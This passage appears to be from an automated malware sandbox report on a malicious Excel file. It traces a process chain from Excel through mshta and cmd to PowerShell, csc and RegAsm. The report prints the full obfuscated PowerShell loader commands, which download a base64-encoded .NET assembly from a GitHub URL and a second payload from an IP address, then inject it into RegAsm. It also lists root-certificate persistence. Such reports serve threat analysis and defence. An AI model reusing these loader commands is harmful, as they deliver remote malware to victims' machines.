VyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,33_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899D51F8 push ds; ret 7_2_000007FE899D5242
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899D022D push eax; iretd 7_2_000007FE899D0241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899D5867 push edi; ret 7_2_000007FE899D586A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899D00BD pushad ; iretd 7_2_000007FE899D00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899D57D3 push eax; ret 7_2_000007FE899D57E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899D57FD push esp; ret 7_2_000007FE899D583A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899A022D push eax; iretd 14_2_000007FE899A0241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899A6088 push esp; ret 14_2_000007FE899A6092
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899A00BD pushad ; iretd 14_2_000007FE899A00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899A664E push esp; iretd 14_2_000007FE899A6654
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10002806 push ecx; ret 16_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044693D push ecx; ret 20_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044DB70 push eax; ret 20_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044DB70 push eax; ret 20_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00451D54 push eax; ret 20_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B090 push eax; ret 21_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B090 push eax; ret 21_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00451D34 push eax; ret 21_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00444E71 push ecx; ret 21_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00414060 push eax; ret 22_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00414060 push eax; ret 22_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00414039 push ecx; ret 22_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004164EB push 0000006Ah; retf 22_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00416553 push 0000006Ah; retf 22_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00416555 push 0000006Ah; retf 22_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004470B7 push eax; retf 0046h33_2_004470B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00457186 push ecx; ret 33_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0045E55D push esi; ret 33_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00457AA8 push eax; ret 33_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434EB6 push ecx; ret 33_2_00434EC9

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00406EEB ShellExecuteW,URLDownloadToFileW,33_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,33_2_0041CBE1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
